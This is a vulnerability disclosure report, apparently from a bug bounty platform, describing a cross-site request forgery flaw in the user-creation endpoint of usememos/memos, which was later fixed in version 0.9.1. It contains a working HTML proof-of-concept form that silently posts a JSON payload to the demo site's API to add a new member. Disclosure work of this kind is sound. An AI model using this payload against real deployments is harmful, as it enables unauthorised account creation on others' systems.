Cross-Site Request Forgery (CSRF) in Add Users in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

Hello Team,

Create a member functionality is vulnerable for CSRF Attack , by exploiting CSRF vulnerability , attacker can add new Members

<html>

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/user" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;corry&quot;&#44;&quot;password&quot;&#58;&quot;corry&quot;&#44;&quot;role&quot;&#58;&quot;USER&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC video: https://drive.google.com/file/d/1dN2ug8qjwbz1CGbfuBldwam_IFE4BNyH/view?usp=sharing

Fix: I just want to suggest you to set a CSRF token .

Impact

Attacker can Add New members in Portal by exploiting the CSRF issue.

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Anil Bhatt modified the report
a year ago
Anil Bhatt modified the report
a year ago
STEVEN validated this vulnerability a year ago
xo19do has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago
to join this conversation